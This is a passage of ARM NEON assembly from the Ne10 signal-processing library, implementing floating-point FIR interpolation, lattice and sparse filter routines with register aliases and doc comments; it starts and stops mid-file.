.unreq dTemp_0
.unreq dTemp_1
.unreq qInp1
.unreq dInp1_0
.unreq dInp1_1
.unreq qAcc1
.unreq dAcc1_0
.unreq dAcc1_1
.unreq qAcc2
.unreq dAcc2_0
.unreq dAcc2_1
.unreq qAcc3
.unreq dAcc3_0
.unreq dAcc3_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qInp2
.unreq dInp2_0
.unreq dInp2_1
#endif
@/* ENABLE_NE10_FIR_DECIMATE_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * bN, bN-1, bN-2, .....b1, b0
@ *
@ * <b>Cycle Count:</b>
@ *
@ * when the S->tapnumTaps/S->L is big , you could get
@ * maximized improvement
@ *
@ * <code> C0 + C2 * blockSize + C3 * blockSize * interpolateFactor + C4 * numTaps * blockSize * interpolateFactor </code>
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_INTERPOLATE_FLOAT_NEON
.align 4
.global ne10_fir_interpolate_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_interpolate_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pB .req R5 @/* Temporary pointers for coefficient buffer */
pCoeffs .req R5 @/* Coefficient pointer */
pStateCurnt .req R5 @/* Points to the current sample of the state */
pX .req R6 @/* Temporary pointers for state buffer */
interpolationFact .req R7
intFact .req R8
phaseLen .req R9
Offset .req R10
Count .req R11 @ /* Loop counter */
pTemp .req R11
mask .req R12
pMask .req R14 @ /* Mask Table */
index .req R14
@/*NEON variale Declaration*/
qInp .qn Q0.F32
dInp_0 .dn D0.F32
dInp_1 .dn D1.F32
qCoeff0 .qn Q1.F32
dCoeff0_0 .dn D2.F32
dCoeff0_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qCoeff1 .qn Q10.F32
dCoeff1_0 .dn D20.F32
dCoeff1_1 .dn D21.F32
qCoeff2 .qn Q11.F32
dCoeff2_0 .dn D22.F32
dCoeff2_1 .dn D23.F32
qCoeff3 .qn Q12.F32
dCoeff3_0 .dn D24.F32
dCoeff3_1 .dn D25.F32
qMask1 .qn Q13.F32
dMask1_0 .dn D26.F32
dMask1_1 .dn D27.F32
qMaskTemp .qn Q14.U32
dMaskTemp_0 .dn D28.U32
dMaskTemp_1 .dn D29.U32
LDRB interpolationFact,[pStateStruct],#2
LDRH phaseLen,[pStateStruct],#2
LDR pCoeffs,[pStateStruct],#4
LDR pState,[pStateStruct],#4
LSL Offset,interpolationFact, #2
@/* S->state buffer contains previous frame (phaseLen - 1) samples */
@/* pStateCurnt points to the location where the new input data should be written */
AND phaseLen,#3
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC3_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC3:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
@/* Total number of intput samples */
@/*Load Mask Value*/
AND mask,interpolationFact,#3
ADD pTemp,pMask,phaseLen,LSL #4
ADD mask,pMask,mask,LSL #4
VLD1 {dMaskTemp_0,dMaskTemp_1},[pTemp]
VLD1 {dMask1_0,dMask1_1},[mask]
VEOR qZero,qZero,qZero
@/* Loop over the blockSize. */
CMP blockSize,#0
BEQ firInterpolateCopyData
firInterpolateBlockLoop:
@/* Copy new input sample into the state buffer */
LDRH phaseLen,[pStateStruct,#-10]
LDR mask,[pSrc],#4
SUB phaseLen,#1
ADD pStateCurnt,pState,phaseLen, LSL #2
LDRB interpolationFact,[pStateStruct,#-12]
STR mask,[pStateCurnt]
SUBS intFact,interpolationFact,#4
MOV index,#4
BLT firInterpolateEndIntplLoop
firInterpolateInterpolLoop:
VEOR qAcc0,qAcc0,qAcc0
LDRH phaseLen,[pStateStruct,#-10]
LDR pCoeffs,[pStateStruct,#-8]
MOV pX,pState
SUB mask,interpolationFact,index
ADD pB,pCoeffs,mask, LSL #2
@/*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
VLD1 {dInp_0,dInp_1},[pX]!
@/* Loop over the polyPhase length. Unroll by a factor of 4.
@ ** Repeat until we've computed numTaps-(4*S->L) coefficients. */
SUBS phaseLen,#4
BLT firInterpolateEndPhaseLoop
firInterpolatePhaseLoop:
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dInp_0[0]
VMLA qAcc0,qCoeff1,dInp_0[1]
VMLA qAcc0,qCoeff2,dInp_1[0]
VMLA qAcc0,qCoeff3,dInp_1[1]
VLD1 {dInp_0,dInp_1},[pX]!
@ /*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
SUBS phaseLen,#4
BGE firInterpolatePhaseLoop
firInterpolateEndPhaseLoop:
@/* If the polyPhase length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTemp
VBSL qMask,qInp,qZero
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dOut_0[0]
VMLA qAcc0,qCoeff1,dOut_0[1]
VMLA qAcc0,qCoeff2,dOut_1[0]
VMLA qAcc0,qCoeff3,dOut_1[1]
@ /* The result is in the accumulator is in Reverse Order*/
VREV64 qAcc0,qAcc0
@/*Swap the D-Regs of Acc*/
VMOV dCoeff0_0,dAcc0_1
VMOV dCoeff0_1,dAcc0_0
VST1 {dCoeff0_0,dCoeff0_1},[pDst]!
ADD index,#4
SUBS intFact,#4
BGE firInterpolateInterpolLoop
firInterpolateEndIntplLoop:
ADDS intFact,#4
BEQ firInterpolateNextSample
@/*Handle the Remaining Samples*/
VEOR qAcc0,qAcc0,qAcc0
LDRH phaseLen,[pStateStruct,#-10]
LDR pCoeffs,[pStateStruct,#-8]
MOV pX,pState
SUB mask,interpolationFact,index
ADD pB,pCoeffs,mask, LSL #2
@/*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
VLD1 {dInp_0,dInp_1},[pX]!
@/* Loop over the polyPhase length. Unroll by a factor of 4.
@ ** Repeat until we've computed numTaps-(4*S->L) coefficients. */
SUBS phaseLen,#4
BLT firInterpolateEndPhaseLoop1
firInterpolatePhaseLoop1:
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dInp_0[0]
VMLA qAcc0,qCoeff1,dInp_0[1]
VMLA qAcc0,qCoeff2,dInp_1[0]
VMLA qAcc0,qCoeff3,dInp_1[1]
VLD1 {dInp_0,dInp_1},[pX]!
@ /*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
SUBS phaseLen,#4
BGE firInterpolatePhaseLoop1
firInterpolateEndPhaseLoop1:
@/* If the polyPhase length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTemp
VBSL qMask,qInp,qZero
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dOut_0[0]
VMLA qAcc0,qCoeff1,dOut_0[1]
VMLA qAcc0,qCoeff2,dOut_1[0]
VMLA qAcc0,qCoeff3,dOut_1[1]
@ /* The result is in the accumulator is in Reverse Order*/
VREV64 qAcc0,qAcc0
VMOV qMask,qMask1
VLD1 {dTemp_0,dTemp_1},[pDst]
@/*Swap the D-Regs of Acc*/
VMOV dCoeff0_0,dAcc0_1
VMOV dCoeff0_1,dAcc0_0
VBSL qMask,qCoeff0,qTemp
VST1 {dMask_0,dMask_1},[pDst]
ADD pDst,pDst,intFact, LSL #2
firInterpolateNextSample:
SUBS blockSize,#1
ADD pState,#4
BGT firInterpolateBlockLoop
@/*End of Processing*/
firInterpolateCopyData:
@/* Save previous phaseLen - 1 samples and get rid of other samples */
@/* Points to the start of the state buffer */
LDRH phaseLen,[pStateStruct,#-10]
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC4_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC4:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
LDR pStateCurnt,[pStateStruct,#-4]
SUB phaseLen,phaseLen,#1
AND mask,phaseLen,#3
ADD pTemp,pMask,mask,LSL #4
VLD1 {dInp_0,dInp_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
@/* copy data */
SUBS Count,phaseLen,#4
BLT firInterpolateEnd
firInterpolateCopyLoop:
VST1 {dInp_0,dInp_1},[pStateCurnt]!
SUBS Count,#4
VLD1 {dInp_0,dInp_1},[pState]!
BGE firInterpolateCopyLoop
firInterpolateEnd:
VLD1 {dTemp_0,dTemp_1},[pStateCurnt]
VBSL qMask,qInp,qTemp
VST1 {dOut_0,dOut_1},[pStateCurnt]
ADD pStateCurnt,pStateCurnt,mask, LSL #2
@/*Return From Function*/
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pB
.unreq pCoeffs
.unreq pStateCurnt
.unreq pX
.unreq interpolationFact
.unreq intFact
.unreq phaseLen
.unreq Offset
.unreq Count
.unreq pTemp
.unreq mask
.unreq pMask
.unreq index
@/*NEON variale Declaration*/
.unreq qInp
.unreq dInp_0
.unreq dInp_1
.unreq qCoeff0
.unreq dCoeff0_0
.unreq dCoeff0_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qCoeff1
.unreq dCoeff1_0
.unreq dCoeff1_1
.unreq qCoeff2
.unreq dCoeff2_0
.unreq dCoeff2_1
.unreq qCoeff3
.unreq dCoeff3_0
.unreq dCoeff3_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTemp
.unreq dMaskTemp_0
.unreq dMaskTemp_1
#endif
@/* ENABLE_NE10_FIR_INTERPOLATE_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numStages and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * k1, k2, ...kM-1
@ *
@ * <b>Cycle Count:</b>
@ *
@ * when the block size >= 32, the tap is little, you could get
@ * maximized improvement
@ *
@ * <code>c0 + c1 * blockSize + c2 * numStages * blockSize</code>
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_LATTICE_FLOAT_NEON
.align 4
.global ne10_fir_lattice_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_lattice_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pCoeffs .req R5 @/* Coefficient pointer */
pX .req R7 @/* Temporary pointers for state buffer */
pB .req R8 @/* Temporary pointers for coefficient buffer */
numStages .req R9 @/* Length of the filter */
stageCnt .req R10 @ /* Loop counter */
pTemp .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12
@/*NEON variale Declaration*/
qFcurr .qn Q0.F32
dFcurr_0 .dn D0.F32
dFcurr_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qFnext .qn Q10.F32
dFnext_0 .dn D20.F32
dFnext_1 .dn D21.F32
qGcurr .qn Q11.F32
dGcurr_0 .dn D22.F32
dGcurr_1 .dn D23.F32
qGnext .qn Q12.F32
dGnext_0 .dn D24.F32
dGnext_1 .dn D25.F32
qMask1 .qn Q13.U32
dMask1_0 .dn D26.U32
dMask1_1 .dn D27.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qTemp1 .qn Q15.F32
dTemp1_0 .dn D30.F32
dTemp1_1 .dn D31.F32
fNext .dn D0.F32
gCurr .dn D1.F32
gNext .dn D2.F32
fCurr .dn D3.F32
Coeff .dn D4.F32
@/* Length of the filter */
LDRH numStages,[pStateStruct],#4
@/* State pointer */
LDR pState,[pStateStruct],#4
@/* Coefficient pointer */
LDR pCoeffs,[pStateStruct],#4
@// Get the Mask Values
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC5_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC5:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
SUB numStages,#1
AND mask,numStages, #3
AND stageCnt,blockSize,#3
ADD pTemp,pMask,mask,LSL #4
ADD stageCnt,pMask,stageCnt,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp]
VLD1 {dMask1_0,dMask1_1},[stageCnt]
VEOR qZero,qZero,qZero
SUBS blockSize,#4
BLT firLatticeEndOuterLoop
firLatticeOuterLoop:
@/* Initialize coeff pointer */
MOV pB,pCoeffs
@/* Initialize state pointer */
MOV pX,pState
@/* Read Four samples from input buffer: fcurr0, fcurr1,fcurr2,fcurr3*/
@/* f0(n) = x(n) */
VLD1 {dFcurr_0,dFcurr_1},[pSrc]!
@/*Read one Sample from the State Buffer*/
VLD1 {dGcurr_1[1]},[pX]
VEXT qGnext,qGcurr,qFcurr,#3
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VMOV qFnext,qFcurr
VST1 {dFcurr_1[1]},[pX]!
@/* fi(n) = fi-1(n) + Ki * gi-1(n-1) */
@/* gi(n) = fi-1(n) * Ki + gi-1(n-1) */
@/* ki*gcurr4+fcurr4 ki*gcurr3+fcurr3 ki*gcurr2+fcurr2 ki*gcurr1+fcurr1*/
VMLA qFcurr,qGnext,qCoeff
@/* ki*fcurr4+gcurr4 ki*fcurr3+gcurr3 ki*fcurr2+gcurr2 ki*fcurr1+gcurr1*/
VMLA qGnext,qFnext,qCoeff
@/* Loop unrolling. Process 4 taps at a time . */
SUBS stageCnt,numStages,#4
BLT firLatticeEndInnerLoop
@/* Loop over the number of taps. Unroll by a factor of 4.
@ * Repeat until we've computed numStages-3 coefficients. */
@/* Process 2nd, 3rd, 4th and 5th taps ... here */
firLatticeInnerLoop:
VLD1 {dGcurr_1[1]},[pX]!
VREV64 dTemp_0,dGnext_1
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT qGcurr,qGcurr,qGnext,#3
@ /* fi(n) = fi-1(n) + Ki * gi-1(n-1) */
@/* gi(n) = fi-1(n) * Ki + gi-1(n-1) */
@/* ki*gcurr4+fcurr4 ki*gcurr3+fcurr3 ki*gcurr2+fcurr2 ki*gcurr1+fcurr1*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
@/* ki*fcurr4+gcurr4 ki*fcurr3+gcurr3 ki*fcurr2+gcurr2 ki*fcurr1+gcurr1*/
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
@/*Prepare for Next Stage*/
VLD1 {dGcurr_1[1]},[pX]!
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT dTemp_0,dGnext_1,dTemp_0,#1
VEXT qGcurr,qGcurr,qGnext,#3
@/*Next Stage*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
@/*Prepare for Next Stage*/
VLD1 {dGcurr_1[1]},[pX]!
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
@/*Next Stage*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
@/*Prepare for Next Stage*/
VLD1 {dGcurr_1[1]},[pX]!
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
VREV64 qTemp,qTemp
@/*Next Stage*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qFcurr,qGcurr,qCoeff
VMLA qGnext,qFnext,qCoeff
SUB pX,#16
@/*Store the samples in the state buffer for next frame*/
VST1 {dTemp_0,dTemp_1},[pX]!
SUBS stageCnt,#4
BGE firLatticeInnerLoop
firLatticeEndInnerLoop:
ADDS stageCnt,#4
BEQ firLatticeFinishInner
VMOV qMask,qMaskTmp
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dGcurr_1[1]},[pX]!
VREV64 dTemp_0,dGnext_1
VBSL qMask,qCoeff,qZero
VEXT qGcurr,qGcurr,qGnext,#3
VDUP qCoeff,dMask_0[0]
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dGcurr_1[1]},[pX]!
VDUP qCoeff,dMask_0[1]
VEXT dTemp_0,dGnext_1,dTemp_0,#1
VEXT qGcurr,qGcurr,qGnext,#3
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dGcurr_1[1]},[pX]!
VDUP qCoeff,dMask_1[0]
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dGcurr_1[1]},[pX]!
VDUP qCoeff,dMask_1[1]
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
VREV64 qTemp,qTemp
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
SUB pX,pX,#16
VMOV qMask,qMaskTmp
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dTemp1_0,dTemp1_1},[pX]
VMLA qGnext,qFnext,qCoeff
VBSL qMask,qTemp,qTemp1
VST1 {dMask_0,dMask_1},[pX]
ADD pX,pX,stageCnt, LSL #2
firLatticeFinishInner:
VST1 {dFcurr_0,dFcurr_1},[pDst]!
SUBS blockSize,#4
BGE firLatticeOuterLoop
firLatticeEndOuterLoop:
ADDS blockSize,#4
BEQ firLatticeEnd
firLatticeOuterLoop1:
VLD1 {fCurr[0]},[pSrc]!
MOV pB,pCoeffs
MOV pX,pState
VLD1 {gCurr[0]},[pX]
VLD1 {Coeff[0]},[pB]!
VST1 {fCurr[0]},[pX]!
VMOV gNext,gCurr
VMLA gNext,Coeff,fCurr
VMLA fCurr,Coeff,gCurr
SUBS stageCnt,numStages,#1
BLE firLatticeEndinnerLoop1
firLatticeInnerLoop1:
VLD1 {gCurr[0]},[pX]
VST1 {gNext[0]},[pX]!
VLD1 {Coeff[0]},[pB]!
VMOV gNext,gCurr
VMLA gNext,Coeff,fCurr
VMLA fCurr,Coeff,gCurr
SUBS stageCnt,#1
BGE firLatticeInnerLoop1
firLatticeEndinnerLoop1:
VST1 {fCurr[0]},[pDst]!
SUBS blockSize,#1
BGT firLatticeOuterLoop1
firLatticeEnd:
@/*Return From Function*/
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pCoeffs
.unreq pX
.unreq pB
.unreq numStages
.unreq stageCnt
.unreq pTemp
.unreq pMask
.unreq mask
.unreq fNext
.unreq gCurr
.unreq gNext
.unreq fCurr
.unreq Coeff
@/*NEON variale Declaration*/
.unreq qFcurr
.unreq dFcurr_0
.unreq dFcurr_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qFnext
.unreq dFnext_0
.unreq dFnext_1
.unreq qGcurr
.unreq dGcurr_0
.unreq dGcurr_1
.unreq qGnext
.unreq dGnext_0
.unreq dGnext_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qTemp1
.unreq dTemp1_0
.unreq dTemp1_1
#endif
@/* ENABLE_NE10_FIR_LATTICE_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The scratch buffer, pScratch is internally used for holding the state values temporarily.
@ * <b>Cycle Count:</b>
@ *
@ * <code> C0 * blockSize + C1 * numTaps + C2 * numTaps * blockSize</code>
@ *
@ * when the block size >= 32, you could get
@ * maximized improvement
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[out] *pScratch points to the scratch buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_SPARSE_FLOAT_NEON
.align 4
.global ne10_fir_sparse_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_sparse_float_neon:
@ save the point of struct(r0) to stack for stateIndex update
PUSH {r0,r4-r11,lr}
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
pScratch .req R3
blockSize .req R4
size2 .req R4
pYtmp1 .req R0
pOut .req R0
Offset .req R0
readIndex .req R1
numTaps .req R5 @/* Length of the filter */
pState .req R6 @/* State pointer */
pCoeffs .req R7 @/* Coefficient pointer */
stateIndex .req R8
maxDelay .req R9
delaySize .req R9
pTapDelay .req R10
blkCnt .req R11
size1 .req R11
temp .req R1
pTemp .req R14
mask .req R11
pMask .req R11
pX .req R12
pY .req R14
pYtmp2 .req R14
@/*NEON variale Declaration*/
qInp .qn Q0.F32
dInp_0 .dn D0.F32
dInp_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
qMaskF32 .qn Q3.F32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qMaskTmp .qn Q10.U32
dMaskTmp_0 .dn D20.U32
dMaskTmp_1 .dn D21.U32
/*Load Mask Table*/
LDRH numTaps,[pStateStruct],#2
LDRH stateIndex,[pStateStruct],#2
LDR pState,[pStateStruct],#4
LDR pCoeffs,[pStateStruct],#4
LDRH maxDelay,[pStateStruct],#4
LDR pTapDelay,[pStateStruct],#4
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC6_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC6:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
ADD delaySize,blockSize,maxDelay
VEOR qZero,qZero
AND pY,blockSize,#3
ADD pY,pMask,pY,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pY]
@/* BlockSize of Input samples are copied into the state buffer */
@/* StateIndex points to the starting position to write in the state buffer */
MOV pX,pState
LSL Offset,stateIndex,#2
SUBS blkCnt,blockSize,#1
BLT firSparseEndSrcCopy
firSparseSrcCopyLoop:
LDR pY,[pSrc],#4
STR pY,[pX,Offset]
ADD Offset,#4
CMP delaySize,Offset,LSR #2
IT LE
SUBLE Offset,Offset,delaySize, LSL #2
SUBS blkCnt,#1
BGE firSparseSrcCopyLoop
firSparseEndSrcCopy:
LSR stateIndex,Offset,#2
LDR Offset,[SP,#0]
STRH stateIndex,[Offset,#2]
LDR readIndex,[pTapDelay],#4
ADD readIndex,readIndex,blockSize
SUBS readIndex,stateIndex,readIndex
@/*Wrap arround index*/
IT LT
ADDLT readIndex,readIndex,delaySize
@/*Processing begins*/
@/*First stage*/
MOV pY,pState
MOV pX,pScratch
@/* copy the sample from the circular buffer to the destination buffer */
SUB size1,delaySize,readIndex
CMP size1,blockSize
IT GT
MOVGT size1,blockSize
ADD pYtmp1,pY,readIndex, LSL #2
SUB size2,blockSize,size1
MOV pYtmp2,pY
CMP size1,#0
BLE firSparseEndcopy1
firSparseCopy1:
LDR temp,[pYtmp1],#4
SUBS size1,#1
STR temp,[pScratch],#4
BGT firSparseCopy1
firSparseEndcopy1:
CMP size2,#0
BLE firSparseEndcopy2
firSparseCopy2:
LDR temp,[pYtmp2],#4
SUBS size2,#1
STR temp,[pScratch],#4
BGT firSparseCopy2
firSparseEndcopy2:
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
MOV pOut,pDst
VLD1 {dCoeff_0[],dCoeff_1[]},[pCoeffs]!
@//CMP tapCnt,numTaps
@//Complete the case of tapCnt=numTaps
SUBS blkCnt,blockSize,#4
VLD1 {dInp_0,dInp_1},[pX]!
BLT firSparseEndInnerLoop
firSparseInnerLoop:
VMUL qAcc0,qInp,qCoeff
VLD1 {dInp_0,dInp_1},[pX]!
SUBS blkCnt,#4
VST1 {dAcc0_0,dAcc0_1},[pOut]!
BGE firSparseInnerLoop
firSparseEndInnerLoop:
ADDS blkCnt,#4
@/* If the blockSize is not a multiple of 4,
@* * compute the remaining samples */
VLD1 {dTemp_0,dTemp_1},[pOut]
VMUL qAcc0,qInp,qCoeff
VMOV qMask,qMaskTmp
VBSL qMask,qAcc0,qTemp
VST1 {dMask_0,dMask_1},[pOut]
ADD pOut,pOut,blkCnt,LSL #2
LDR readIndex,[pTapDelay],#4
ADD readIndex,readIndex,blockSize
SUBS readIndex,stateIndex,readIndex
@/*Wrap arround index*/
IT LT
ADDLT readIndex,readIndex,delaySize
SUBS numTaps,#1
BLE firSparseEnd
firSparseOuterLoop:
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
MOV pY,pState
MOV pX,pScratch
@/* copy the sample from the circular buffer to the destination buffer */
SUB size1,delaySize,readIndex
CMP size1,blockSize
IT GT
MOVGT size1,blockSize
ADD pYtmp1,pY,readIndex, LSL #2
SUB size2,blockSize,size1
MOV pYtmp2,pY
CMP size1,#0
BLE firSparseEndcopy3
firSparseCopy3:
LDR temp,[pYtmp1],#4
SUBS size1,#1
STR temp,[pScratch],#4
BGT firSparseCopy3
firSparseEndcopy3:
CMP size2,#0
BLE firSparseEndcopy4
firSparseCopy4:
LDR temp,[pYtmp2],#4
SUBS size2,#1
STR temp,[pScratch],#4
BGT firSparseCopy4
firSparseEndcopy4:
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
MOV pOut,pDst
VLD1 {dCoeff_0[],dCoeff_1[]},[pCoeffs]!
@//Complete the case of tapCnt=numTaps
SUBS blkCnt,blockSize,#4
VLD1 {dInp_0,dInp_1},[pX]!
VLD1 {dAcc0_0,dAcc0_1},[pOut]
BLT firSparseEndInnerLoop1
firSparseInnerLoop1:
